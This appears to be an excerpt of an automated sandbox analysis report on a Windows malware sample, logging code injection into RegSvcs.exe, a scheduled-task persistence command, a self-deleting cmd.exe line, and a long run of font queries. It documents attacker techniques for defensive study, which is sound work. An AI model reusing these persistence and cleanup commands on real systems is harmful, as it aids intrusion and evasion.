Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FE3008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VVhTSSmjNa' /XML 'C:\Users\user\AppData\Local\Temp\tmp27F.tmp'
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: explorer.exe, 00000007.00000002.911506463.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000007.00000002.912007261.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000009.00000002.913010632.0000000004850000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.680516235.0000000005E50000.00000004.00000001.sdmp, ipconfig.exe, 00000009.00000002.913010632.0000000004850000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.912007261.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000009.00000002.913010632.0000000004850000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.912007261.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000009.00000002.913010632.0000000004850000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.685038771.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\YNzE2QUkvaTK7kd.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
